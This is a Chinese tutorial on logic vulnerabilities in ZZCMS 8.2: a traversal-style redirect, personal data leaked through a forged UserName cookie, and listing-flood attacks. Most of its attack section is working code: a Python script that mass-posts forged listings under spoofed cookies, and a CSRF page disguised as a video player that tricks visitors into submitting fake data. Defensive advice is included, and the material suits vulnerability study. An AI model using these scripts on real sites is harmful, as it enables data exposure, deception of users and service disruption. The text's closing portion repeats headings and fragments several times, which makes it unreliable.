ZZCMS 8.2 业务逻辑漏洞分析与实战教学<\/h1>

前言<\/h2>
本文详细分析ZZCMS 8.2版本中存在的多个业务逻辑漏洞，包括目录跳转读取敏感信息、个人敏感信息泄露漏洞、业务设计缺陷导致的拒绝服务攻击等。通过本教学文档，您将学习到如何发现、分析和利用这些漏洞，以及相应的防御措施。<\/p>

漏洞一：目录跳转读取敏感信息<\/h2>

漏洞位置<\/h3>
`zzcms8.2\/baojia\/baojia.php<\/code> 第4行引用了 zzcms8.2\/inc\/top.php<\/code><\/p>`

漏洞分析<\/h3>

该文件在引用时进行了if逻辑判断，判断中存在可控变量<\/li>
服务器端接收POST请求执行跳转操作，但前端没有相关参数<\/li>
黑盒测试难以发现此漏洞，因为：

不知道存在POST请求处理<\/li>
不知道具体参数名称<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用步骤<\/h3>

使用Burp Suite将GET请求改为POST请求<\/li>
尝试XSS攻击失败（"被HTML编码，'被转义）<\/li>
改用目录跳转思路，使用问号伪截断技术<\/li>
构造POST请求包示例：
POST \/zzcms8.2\/baojia\/baojia.php HTTP\/1.1
Host: target.com
Content-Type: application\/x-www-form-urlencoded

redirect=..\/..\/..\/..\/..\/..\/..\/?&
<\/code><\/pre>
<\/li>
<\/ol>
利用效果<\/h3>

可读取服务器根目录下的敏感文件<\/li>
可用于发现网站真实IP（绕过CDN）<\/li>
<\/ul>
漏洞二：逻辑漏洞导致个人敏感信息泄露<\/h2>
漏洞位置<\/h3>
zzcms8.2\/baojia\/baojiaadd.php<\/code> 第183-213行<\/p>
漏洞分析<\/h3>

系统从用户Cookie中获取UserName<\/li>
如果UserName存在且数据库中匹配，则返回该用户的：

公司名<\/li>
真实姓名<\/li>
手机号码<\/li>
邮箱<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用步骤<\/h3>

设置Cookie中的UserName为数据库中存在的用户名
Cookie: UserName=test2;
<\/code><\/pre>
<\/li>
访问相关页面即可获取该用户的敏感信息<\/li>
<\/ol>
防御建议<\/h3>

增加权限验证<\/li>
对敏感信息进行加密存储<\/li>
实现完善的会话管理机制<\/li>
<\/ul>
漏洞三：设计缺陷漏洞+CSRF组合攻击<\/h2>
漏洞位置<\/h3>
zzcms8.2\/baojia\/baojiaadd.php<\/code> 第183-242行及274-313行<\/p>
漏洞分析<\/h3>

同一用户可反复发布报价信息<\/li>
无发布数量限制<\/li>
验证码功能存在缺陷（本案例中已注释掉）<\/li>
无CSRF防护机制<\/li>
<\/ol>
攻击原理<\/h3>

利用业务设计缺陷大量提交伪造报价信息<\/li>
结合CSRF让大量用户自动提交<\/li>
导致：

数据库被垃圾数据填塞<\/li>
管理员审核工作负担剧增<\/li>
正常业务无法开展<\/li>
<\/ul>
<\/li>
<\/ol>
攻击演示<\/h3>
方法一：Python脚本自动化攻击<\/h4>
import<\/span> requests
<\/span><\/span>import<\/span> os
<\/span><\/span>import<\/span> random
<\/span><\/span>import<\/span> ast
<\/span><\/span>
<\/span><\/span>def<\/span> attack<\/span>():
<\/span><\/span>    host =<\/span> 'http:\/\/localhost\/zzcms8.2\/baojia\/baojiaadd.php?'<\/span>
<\/span><\/span>    users =<\/span> ['mayun'<\/span>,'mahuateng'<\/span>,'zhouhongwei'<\/span>,'leijun'<\/span>,'liyanhong'<\/span>]
<\/span><\/span>    un =<\/span> random.<\/span>randint(0<\/span>,len(users)-<\/span>1<\/span>)
<\/span><\/span>    cookie_value =<\/span> '"Cookie":"UserName=<\/span>{user_forgery}<\/span>;"'<\/span>.<\/span>format(user_forgery=<\/span>users[un])
<\/span><\/span>    header =<\/span> '{'<\/span>+<\/span>cookie_value+<\/span>'}'<\/span>
<\/span><\/span>    header =<\/span> ast.<\/span>literal_eval(header)
<\/span><\/span>    
<\/span><\/span>    # 构造伪造数据<\/span>
<\/span><\/span>    product =<\/span> ['防晒面膜'<\/span>,'护手霜'<\/span>,'澳洲牛排'<\/span>,'纸尿布'<\/span>,'充气娃娃'<\/span>]
<\/span><\/span>    pn =<\/span> random.<\/span>randint(0<\/span>,len(product)-<\/span>1<\/span>)
<\/span><\/span>    price_value =<\/span> str(random.<\/span>randint(25<\/span>,500<\/span>))
<\/span><\/span>    companyname_values =<\/span> ['阿里巴巴'<\/span>,'腾讯'<\/span>,'百度'<\/span>,'小米'<\/span>,'360'<\/span>]
<\/span><\/span>    cn =<\/span> random.<\/span>randint(0<\/span>,len(companyname_values)-<\/span>1<\/span>)
<\/span><\/span>    truename_values =<\/span> ['马云'<\/span>,'马化腾'<\/span>,'周鸿伟'<\/span>,'李彦宏'<\/span>,'雷军'<\/span>]
<\/span><\/span>    tn =<\/span> random.<\/span>randint(0<\/span>,len(truename_values)-<\/span>1<\/span>)
<\/span><\/span>    tel_value =<\/span> '15'<\/span>+<\/span>''<\/span>.<\/span>join([str(random.<\/span>randint(0<\/span>,9<\/span>)) for<\/span> _ in<\/span> range(8<\/span>)])
<\/span><\/span>    address_value =<\/span> ['宿迁市宿城区西湖路358号'<\/span>,'河南省开封市鼓楼区黄河大街中段1号'<\/span>]
<\/span><\/span>    an =<\/span> random.<\/span>randint(0<\/span>,len(address_value)-<\/span>1<\/span>)
<\/span><\/span>    email_suffix =<\/span> ['@163.com'<\/span>,'@qq.com'<\/span>,'@sina.com'<\/span>,'@souhu.com'<\/span>,'@gmail.com'<\/span>]
<\/span><\/span>    en =<\/span> random.<\/span>randint(0<\/span>,len(email_suffix)-<\/span>1<\/span>)
<\/span><\/span>    email_value =<\/span> ''<\/span>.<\/span>join([str(random.<\/span>randint(0<\/span>,9<\/span>)) for<\/span> _ in<\/span> range(12<\/span>)])+<\/span>email_suffix[en]
<\/span><\/span>    
<\/span><\/span>    payload =<\/span> {
<\/span><\/span>        "cp"<\/span>: product[pn],
<\/span><\/span>        "classid"<\/span>: "王二狗专属"<\/span>,
<\/span><\/span>        "province"<\/span>: "王二狗大街"<\/span>,
<\/span><\/span>        "city"<\/span>: "王二狗城市"<\/span>,
<\/span><\/span>        "xiancheng"<\/span>: "王二狗县"<\/span>,
<\/span><\/span>        "price"<\/span>: price_value,
<\/span><\/span>        "companyname"<\/span>: companyname_values[cn],
<\/span><\/span>        "truename"<\/span>: truename_values[tn],
<\/span><\/span>        "tel"<\/span>: tel_value,
<\/span><\/span>        "address"<\/span>: address_value[an],
<\/span><\/span>        "email"<\/span>: email_value,
<\/span><\/span>        "yzm"<\/span>: "1234"<\/span>,
<\/span><\/span>        "Submit"<\/span>: "发布"<\/span>,
<\/span><\/span>        "action"<\/span>: "add"<\/span>
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    r =<\/span> requests.<\/span>post(host, data=<\/span>payload, headers=<\/span>header)
<\/span><\/span>    print(r.<\/span>content.<\/span>decode('utf-8'<\/span>))
<\/span><\/span>
<\/span><\/span>def<\/span> exp<\/span>():
<\/span><\/span>    num =<\/span> int(input('请输入要发送的伪造数据包个数:'<\/span>))
<\/span><\/span>    for<\/span> _ in<\/span> range(num):
<\/span><\/span>        attack()
<\/span><\/span>    print('<\/span>\n<\/span>-攻击结束-'<\/span>)
<\/span><\/span>
<\/span><\/span>exp()
<\/span><\/span><\/code><\/pre>方法二：CSRF攻击页面<\/h4>
<html<\/span>>
<\/span><\/span><head<\/span>>
<\/span><\/span><meta<\/span> charset<\/span>=<\/span>"UTF-8"<\/span>>
<\/span><\/span><\/head<\/span>>
<\/span><\/span><body<\/span>>
<\/span><\/span><h1<\/span>>小电影加载成功!<\/h1<\/span>>
<\/span><\/span><form<\/span> action<\/span>=<\/span>"http:\/\/localhost\/zzcms8.2\/baojia\/baojiaadd.php?"<\/span> method<\/span>=<\/span>"POST"<\/span>>
<\/span><\/span>    <input<\/span> id<\/span>=<\/span>"cp"<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"cp"<\/span> value<\/span>=<\/span>"跨站请求伪造"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"classid"<\/span> value<\/span>=<\/span>"王二狗专属"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"province"<\/span> value<\/span>=<\/span>"大街"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"city"<\/span> value<\/span>=<\/span>"某城市"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"xiancheng"<\/span> value<\/span>=<\/span>"小县镇"<\/span> \/>
<\/span><\/span>    <input<\/span> id<\/span>=<\/span>"price"<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"price"<\/span> value<\/span>=<\/span>"666"<\/span> \/>
<\/span><\/span>    <input<\/span> id<\/span>=<\/span>"companyname"<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"companyname"<\/span> value<\/span>=<\/span>"跨站请求伪造公司"<\/span> \/>
<\/span><\/span>    <input<\/span> id<\/span>=<\/span>"truename"<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"truename"<\/span> value<\/span>=<\/span>"王二狗"<\/span> \/>
<\/span><\/span>    <input<\/span> id<\/span>=<\/span>"tel"<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"tel"<\/span> value<\/span>=<\/span>"18888888888"<\/span> \/>
<\/span><\/span>    <input<\/span> id<\/span>=<\/span>"address"<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"address"<\/span> value<\/span>=<\/span>"跨站请求伪造伪造哦"<\/span> \/>
<\/span><\/span>    <input<\/span> id<\/span>=<\/span>"email"<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"email"<\/span> value<\/span>=<\/span>"123456@qq.com"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"yzm"<\/span> value<\/span>=<\/span>"1234"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"Submit"<\/span> value<\/span>=<\/span>"发布"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"hidden"<\/span> name<\/span>=<\/span>"action"<\/span> value<\/span>=<\/span>"add"<\/span> \/>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"submit"<\/span> value<\/span>=<\/span>"点击播放"<\/span> onclick<\/span>=<\/span>"jump()"<\/span>>
<\/span><\/span><\/form<\/span>>
<\/span><\/span>
<\/span><\/span><script<\/span>>
<\/span><\/span>function<\/span> jump<\/span>() {
<\/span><\/span>    window.location<\/span>.href<\/span>=<\/span>"http:\/\/www.baidu.com"<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>function<\/span> setCookie<\/span>(c_name<\/span>,value<\/span>,expiredays<\/span>) {
<\/span><\/span>    var<\/span> exdate<\/span> =<\/span> new<\/span> Date()
<\/span><\/span>    exdate<\/span>.setDate<\/span>(exdate<\/span>.getDate<\/span>()+<\/span>expiredays<\/span>)
<\/span><\/span>    document.cookie<\/span> =<\/span> c_name<\/span> +<\/span> "="<\/span> +<\/span> escape<\/span>(value<\/span>) +<\/span> ((expiredays<\/span>==<\/span>null<\/span>) ?<\/span> ""<\/span> :<\/span> ";expires="<\/span>+<\/span>exdate<\/span>.toGMTString<\/span>())
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>var<\/span> user_cookie<\/span> =<\/span> ["Helen"<\/span>,"Mike"<\/span>,"Jack"<\/span>,"Nier"<\/span>,"Wyate"<\/span>];
<\/span><\/span>var<\/span> range<\/span> =<\/span> user_cookie<\/span>.length<\/span>;
<\/span><\/span>
<\/span><\/span>function<\/span> rd<\/span>(n<\/span>,m<\/span>){
<\/span><\/span>    var<\/span> c<\/span> =<\/span> m<\/span>-<\/span>n<\/span>+<\/span>1<\/span>;
<\/span><\/span>    return<\/span> Math.floor<\/span>(Math.random<\/span>() *<\/span> c<\/span> +<\/span> n<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>var<\/span> n<\/span> =<\/span> 0<\/span>;
<\/span><\/span>user<\/span> =<\/span> user_cookie<\/span>[rd<\/span>(n<\/span>,range<\/span>)];
<\/span><\/span>setCookie<\/span>('UserName'<\/span>,user<\/span>,'1'<\/span>);
<\/span><\/span>
<\/span><\/span>var<\/span> cp<\/span> =<\/span> ["Q币充值"<\/span>,"淘宝刷单"<\/span>,"游戏代理"<\/span>,"腾讯会员"<\/span>];
<\/span><\/span>cp_value<\/span> =<\/span> cp<\/span>[rd<\/span>(0<\/span>,cp<\/span>.length<\/span>-<\/span>1<\/span>)];
<\/span><\/span>document.getElementById<\/span>("cp"<\/span>).setAttribute<\/span>('value'<\/span>,cp_value<\/span>);
<\/span><\/span>
<\/span><\/span>var<\/span> price<\/span> =<\/span> rd<\/span>(10<\/span>,100<\/span>);
<\/span><\/span>document.getElementById<\/span>("price"<\/span>).setAttribute<\/span>('value'<\/span>,price<\/span>);
<\/span><\/span>
<\/span><\/span>var<\/span> companyname<\/span> =<\/span> ["阿里巴巴"<\/span>,"腾讯"<\/span>,"小米"<\/span>,"京东"<\/span>,"百度"<\/span>,"360"<\/span>];
<\/span><\/span>companyname_value<\/span> =<\/span> companyname<\/span>[rd<\/span>(0<\/span>,companyname<\/span>.length<\/span>-<\/span>1<\/span>)];
<\/span><\/span>document.getElementById<\/span>("companyname"<\/span>).setAttribute<\/span>('value'<\/span>,companyname_value<\/span>);
<\/span><\/span>
<\/span><\/span>var<\/span> truename<\/span> =<\/span> ["小马"<\/span>,"大马"<\/span>,"小雷"<\/span>,"小刘"<\/span>,"小李"<\/span>];
<\/span><\/span>truename_value<\/span> =<\/span> truename<\/span>[rd<\/span>(0<\/span>,truename<\/span>.length<\/span>-<\/span>1<\/span>)];
<\/span><\/span>document.getElementById<\/span>("truename"<\/span>).setAttribute<\/span>('value'<\/span>,truename_value<\/span>);
<\/span><\/span>
<\/span><\/span>var<\/span> tel_top<\/span> =<\/span> '188'<\/span>;
<\/span><\/span>tel_value<\/span> =<\/span> tel_top<\/span> +<\/span> rd<\/span>(0<\/span>,9<\/span>) +<\/span> rd<\/span>(0<\/span>,9<\/span>) +<\/span> rd<\/span>(0<\/span>,9<\/span>) +<\/span> rd<\/span>(0<\/span>,9<\/span>) +<\/span> rd<\/span>(0<\/span>,9<\/span>) +<\/span> rd<\/span>(0<\/span>,9<\/span>) +<\/span> rd<\/span>(0<\/span>,9<\/span>) +<\/span> rd<\/span>(0<\/span>,9<\/span>);
<\/span><\/span>tel_value<\/span> =<\/span> parseInt(tel_value<\/span>);
<\/span><\/span>document.getElementById<\/span>("tel"<\/span>).setAttribute<\/span>('value'<\/span>,tel_value<\/span>);
<\/span><\/span>
<\/span><\/span>var<\/span> email_suffix<\/span> =<\/span> ["@163.com"<\/span>,"@qq.com"<\/span>,"@sina.com"<\/span>,"@gmail.com"<\/span>];
<\/span><\/span>var<\/span> email_value<\/span> =<\/span> tel_top<\/span> +<\/span> rd<\/span>(0<\/span>,9<\/span>) +<\/span> rd<\/span>(0<\/span>,9<\/span>) +<\/span> rd<\/span>(0<\/span>,9<\/span>) +<\/span> rd<\/span>(0<\/span>,9<\/span>) +<\/span> rd<\/span>(0<\/span>,9<\/span>) +<\/span> rd<\/span>(0<\/span>,9<\/span>) +<\/span> rd<\/span>(0<\/span>,9<\/span>) +<\/span> rd<\/span>(0<\/span>,9<\/span>) +<\/span> email_suffix<\/span>[rd<\/span>(0<\/span>,email_suffix<\/span>.length<\/span>-<\/span>1<\/span>)];
<\/span><\/span>document.getElementById<\/span>("email"<\/span>).setAttribute<\/span>('value'<\/span>,email_value<\/span>);
<\/span><\/span>
<\/span><\/span>var<\/span> address<\/span> =<\/span> ['宿迁市宿城区西湖路358号'<\/span>,'河南省开封市鼓楼区黄河大街中段1号'<\/span>];
<\/span><\/span>address_value<\/span> =<\/span> address<\/span>[rd<\/span>(0<\/span>,address<\/span>.length<\/span>-<\/span>1<\/span>)];
<\/span><\/span>document.getElementById<\/span>("address"<\/span>).setAttribute<\/span>('value'<\/span>,address_value<\/span>);
<\/span><\/span><\/script<\/span>>
<\/span><\/span><\/body<\/span>>
<\/span><\/span><\/html<\/span>>
<\/span><\/span><\/code><\/pre>组合攻击效果<\/h3>

通过CSRF页面诱导大量用户点击<\/li>
每个点击会生成不同的伪造数据<\/li>
结合自动化脚本发起"洪水攻击"<\/li>
结果：

数据库被大量伪造数据填塞<\/li>
管理员无法区分真实与伪造数据<\/li>
网站业务受到严重影响<\/li>
<\/ul>
<\/li>
<\/ol>
防御措施<\/h2>


目录跳转漏洞防御<\/strong>：<\/p>

对跳转目标进行严格白名单验证<\/li>
禁止跳转到非预期目录<\/li>
使用绝对路径而非相对路径<\/li>
<\/ul>
<\/li>

敏感信息泄露防御<\/strong>：<\/p>

实现完善的权限验证机制<\/li>
对敏感信息进行加密存储<\/li>
避免直接从Cookie获取关键信息<\/li>
<\/ul>
<\/li>

业务设计缺陷防御<\/strong>：<\/p>

实施合理的业务限制（如发布频率限制）<\/li>
完善验证码机制<\/li>
增加二次确认步骤<\/li>
<\/ul>
<\/li>

CSRF防御<\/strong>：<\/p>

添加CSRF Token<\/li>
检查Referer头<\/li>
关键操作使用POST而非GET<\/li>
<\/ul>
<\/li>

其他建议<\/strong>：<\/p>

定期进行安全审计<\/li>
对用户输入进行严格过滤<\/li>
实现完善的日志记录机制<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
本教学详细分析了ZZCMS 8.2中的多个安全漏洞，展示了如何利用这些漏洞进行攻击，并提供了相应的防御措施。这些漏洞的利用展示了业务逻辑安全问题可能造成的严重影响，强调了在系统设计阶段考虑安全性的重要性。<\/p>

ZZCMS 8.2 业务逻辑漏洞分析与实战教学<\/h1>

漏洞一：目录跳转读取敏感信息<\/h2>

漏洞位置<\/h3>
`zzcms8.2\/baojia\/baojia.php<\/code> 第4行引用了 zzcms8.2\/inc\/top.php<\/code><\/p>`

漏洞二：逻辑漏洞导致个人敏感信息泄露<\/h2>

漏洞位置<\/h3>
`zzcms8.2\/baojia\/baojiaadd.php<\/code> 第183-213行<\/p>`

漏洞三：设计缺陷漏洞+CSRF组合攻击<\/h2>

漏洞位置<\/h3>
`zzcms8.2\/baojia\/baojiaadd.php<\/code> 第183-242行及274-313行<\/p>`

攻击演示<\/h3>

ZZCMS 8.2 业务逻辑漏洞分析与实战教学<\/h1>

漏洞一：目录跳转读取敏感信息<\/h2>

漏洞位置<\/h3> zzcms8.2\/baojia\/baojia.php<\/code> 第4行引用了 zzcms8.2\/inc\/top.php<\/code><\/p>

漏洞二：逻辑漏洞导致个人敏感信息泄露<\/h2>

漏洞位置<\/h3> zzcms8.2\/baojia\/baojiaadd.php<\/code> 第183-213行<\/p>

漏洞三：设计缺陷漏洞+CSRF组合攻击<\/h2>

漏洞位置<\/h3> zzcms8.2\/baojia\/baojiaadd.php<\/code> 第183-242行及274-313行<\/p>

攻击演示<\/h3>

漏洞位置<\/h3>
`zzcms8.2\/baojia\/baojia.php<\/code> 第4行引用了 zzcms8.2\/inc\/top.php<\/code><\/p>`

漏洞位置<\/h3>
`zzcms8.2\/baojia\/baojiaadd.php<\/code> 第183-213行<\/p>`

漏洞位置<\/h3>
`zzcms8.2\/baojia\/baojiaadd.php<\/code> 第183-242行及274-313行<\/p>`